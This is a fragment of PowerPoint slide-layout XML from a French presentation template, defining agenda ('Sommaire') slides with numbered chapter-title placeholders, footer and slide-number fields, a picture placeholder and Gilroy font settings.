                <a:latin typeface="Gilroy ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>sommaire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du pied de page 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF30536F-02EE-4FC7-BBAD-A9937689BFD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Titre de la présentation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA7B848-13D9-4229-ABEE-5A53975F373F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189528" y="2718610"/>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7" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C581A0C-6864-4E71-A7F7-FEB8D5BBCC3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600566" y="2708450"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84006FA8-55DE-44C1-8213-76D793446779}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189528" y="3673832"/>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9" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A08150-F706-448E-9C1A-DB03C67210B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600566" y="3663672"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{740DC8B2-CF29-454B-BF32-C4FD2A55B017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189528" y="4686203"/>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1" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10A40D52-C650-4149-A732-B67351CAC988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600566" y="4676043"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCA01BE2-12AB-4601-B1A8-AE9E72D41B88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6569874" y="2718610"/>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3" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6618BDDA-CD2D-474F-B53D-2CC3B90A3AB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5980912" y="2708450"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72888659-275B-4D1A-88D3-F684CD4FB6E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6569874" y="3673832"/>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5" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E85FCF3F-1449-4ABB-9FE3-C07CE9ADF97C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5980912" y="3663672"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8041416C-AD88-4845-9910-581A331E7174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6569874" y="4686203"/>
            <a:ext cx="2878137" cy="590188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="160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7" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27ECAD95-C30A-46EE-82C2-783B9342B54E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5980912" y="4676043"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du numéro de diapositive 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C815EED-5658-4C5F-BE99-A7BF9BA30945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Image 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A71E8D1-FA8D-44E0-B8FD-638666575CF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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Groupe 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{745EAD79-3F45-4300-980C-D7AEBA626D9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9078366A-54A9-43A5-A89B-D810F9CFDFB2}"/>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4" name="Rectangle 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DAB9B6A-0703-459D-A286-19C9A0715A4E}"/>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307624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Agenda (Picture)">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Espace réservé pour une image  19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA07A7D-38E5-43A8-B670-AC309F258166}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="776648" y="1755244"/>
            <a:ext cx="2537152" cy="3717591"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4680393"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 2339448 w 4680393"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 4680393 w 4680393"/>
              <a:gd name="connsiteY2" fmla="*/ 2348429 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 2442193 w 4680393"/>
              <a:gd name="connsiteY3" fmla="*/ 4694613 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 334573 w 4680393"/>
              <a:gd name="connsiteY4" fmla="*/ 6847559 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 122898 w 4680393"/>
              <a:gd name="connsiteY5" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 468039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80393" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2339448" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3630746" y="0"/>
                  <a:pt x="4680393" y="1053389"/>
                  <a:pt x="4680393" y="2348429"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4680393" y="3643469"/>
                  <a:pt x="3685360" y="4640996"/>
                  <a:pt x="2442193" y="4694613"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2353584" y="5838341"/>
                  <a:pt x="1454875" y="6738117"/>
                  <a:pt x="334573" y="6847559"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="122898" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685800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2" name="Titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8BE665-E252-4CA5-BC25-17F716CF5E6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659182" y="709442"/>
            <a:ext cx="3047947" cy="518795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000" cap="all" baseline="0">
                <a:latin typeface="Gilroy ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sommaire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA7B848-13D9-4229-ABEE-5A53975F373F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4580942" y="232608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27" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C581A0C-6864-4E71-A7F7-FEB8D5BBCC3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4002808" y="232712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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du numéro de diapositive 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B815A916-1CFE-42B0-8C0D-4B6E641805CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du pied de page 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{930EFF25-5A3D-40CE-8381-F57A0145360A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Titre de la présentation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="Image 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0131761E-9CA0-4419-AA9C-ADAC96BE8B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30" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F945C488-1C8C-4329-959A-B4865082E76F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4580942" y="340812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3" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC1F5BC2-B28C-4F0C-A87B-34A415AACCA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4002808" y="340916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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F36DE79C-F5DB-44AC-A234-7A56D84E5956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="29" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4580942" y="449016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5" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42F84BC6-5E2D-4FC4-826C-A7E7842CE9CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="30" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4002808" y="449120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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{049780D8-B046-4C58-9075-4CCB5DF895DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="31" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8726222" y="232608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37" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66788517-4872-48FD-8B19-720943BB5978}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="32" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8148088" y="232712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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE6C0972-C0F3-4160-B4F3-32466FF18FE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="33" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8726222" y="340812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44" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5129212E-3110-4DA5-9261-FE11F6742CC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="34" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8148088" y="340916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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75563559-50FB-4735-882F-E87DD82F46EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="35" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8726222" y="4490168"/>
            <a:ext cx="2878137" cy="590188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1600" baseline="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre du chapitre </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>sur deux lignes si nécessaire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79EA7869-E4A3-4ECF-80A2-A74391294A02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="36" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8148088" y="4491208"/>
            <a:ext cx="421060" cy="590188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gilroy Light" panose="00000400000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:buNone/>
